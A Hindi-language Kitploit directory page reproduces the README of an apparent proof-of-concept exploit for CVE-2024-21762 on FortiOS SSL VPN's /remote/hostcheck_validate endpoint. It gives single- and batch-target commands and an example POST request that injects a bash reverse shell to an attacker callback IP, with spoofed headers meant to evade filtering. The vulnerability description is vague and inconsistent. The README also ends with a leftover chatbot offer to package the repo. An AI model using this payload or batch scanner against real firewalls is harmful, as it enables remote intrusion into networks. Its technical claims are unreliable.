Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-21762_FortiNet_PoC — प्रूफ-ऑफ-कॉन्सेप्ट स्कैनर जो FortiOS SSL VPN के /remote/hostcheck_validate एंडपॉइंट में CVE-2024-21762 को लक्षित करता है, रिवर्स शेल पेलोड डिलीवरी के साथ। | Kitploit
उपकरण/GitHubGitHub/abrewer251/cve-2024-21762_fortinet_poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubabrewer251/cve-2024-21762_fortinet_poc

CVE-2024-21762_FortiNet_PoC

प्रूफ-ऑफ-कॉन्सेप्ट स्कैनर जो FortiOS SSL VPN के /remote/hostcheck_validate एंडपॉइंट में CVE-2024-21762 को लक्षित करता है, रिवर्स शेल पेलोड डिलीवरी के साथ।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

CVE-2024-21762_FortiNet_PoC

FortiOS SSL VPN के /remote/hostcheck_validate एंडपॉइंट पर CVE-2024-21762 को लक्षित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट स्कैनर जिसमें रिवर्स शेल पेलोड डिलीवरी शामिल है।

यहाँ आपके प्रोजेक्ट के लिए एक GitHub-शैली का राइटअप है, जिसमें एक साफ और संक्षिप्त सारांश, उपयोग मार्गदर्शिका और CVE के साथ इसके फिट होने का संदर्भ शामिल है।


🔥 परियोजना शीर्षक: CVE-2024-21762 FortiOS HostCheck PoC Scanner

🧠 सारांश (GitHub विवरण पंक्ति के लिए):

CVE-2024-21762 को लक्षित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट स्कैनर, FortiOS SSL VPN के /remote/hostcheck_validate एंडपॉइंट पर रिवर्स शेल पेलोड डिलीवरी के साथ।


📜 अवलोकन

यह Python स्क्रिप्ट एक PoC (प्रूफ ऑफ कॉन्सेप्ट) टूल है जिसे Fortinet के FortiOS SSL VPN इंटरफ़ेस के साथ इंटरैक्ट करने के लिए डिज़ाइन किया गया है, जो CVE-2024-21762 को लक्षित करता है — /remote/hostcheck_validate एंडपॉइंट में एक स्टैक-आधारित बफर ओवरफ़्लो या कमांड इंजेक्शन भेद्यता।

अस्वीकरण: यह केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।


🧬 यह कैसे काम करता है

  • एक FortiGate SSL VPN इंटरफ़ेस पर /remote/hostcheck_validate पर एक तैयार POST अनुरोध भेजता है।
  • एक सिम्युलेटेड असुरक्षित पैरामीटर (host) में एक bash रिवर्स शेल पेलोड इंजेक्ट करता है।
  • फ़िल्टरिंग को बायपास करने के लिए नकली हेडर (User-Agent, Cookie) का उपयोग करता है।
  • शोषण की सफलता का आकलन करने के लिए सर्वर प्रतिक्रियाओं को प्राप्त करता है और लॉग करता है।
  • फ़ाइल इनपुट/आउटपुट ऑटोमेशन और प्रोग्रेस बार के साथ एकल या बैच लक्ष्य परीक्षण का समर्थन करता है।

🛠️ विशेषताएं

  • 🧪 नियंत्रित फ़ॉर्म फ़ील्ड के माध्यम से रिवर्स शेल पेलोड इंजेक्शन
  • 🧾 विश्लेषण के लिए पूर्ण HTTP प्रतिक्रिया कैप्चर (last_response.txt)
  • 📊 एकल/बैच मोड में ट्रैकिंग के लिए प्रोग्रेस बार
  • 🗃️ इनपुट/आउटपुट फ़ाइल समर्थन के साथ बैच मोड
  • 🔄 मॉड्यूलर और विस्तार योग्य

⚙️ आवश्यकताएं

  • Python 3.6+
  • प्रोग्रेस विज़ुअलाइज़ेशन के लिए tqdm

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install tqdm

🚀 उपयोग

एकल लक्ष्य मोड

root@kitploit:~
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080

बैच मोड

root@kitploit:~
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
  • targets.txt: प्रति पंक्ति IP:PORT प्रारूप में लक्ष्यों की सूची
  • results.txt: शोषण प्रयासों का आउटपुट लॉग

📥 भेजा गया उदाहरण पेलोड

root@kitploit:~
POST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded

host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...

🔍 लॉग्स

यह टूल प्रत्येक प्रयास की पूर्ण HTTP प्रतिक्रिया को यहाँ लिखता है:

root@kitploit:~
last_response.txt

इसका उपयोग यह सत्यापित करने के लिए करें कि अनुरोध पार्स किया गया, अस्वीकार किया गया या कोई त्रुटि कोड लौटाया गया।


⚠️ कानूनी

यह कोड केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग उन नेटवर्कों या सिस्टमों पर न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।


✍️ लेखक

Carter — साइबर सुरक्षा इंजीनियर, Red/Purple Team उत्साही, PoC ऑटोमेशन नर्ड।


क्या आप चाहते हैं कि इसे README.md फ़ाइल + रेपो संरचना में पैकेज करके GitHub पर पुश करने के लिए तैयार किया जाए? मैं वह अगला उत्पन्न कर सकता हूँ।

टूल डाउनलोड करें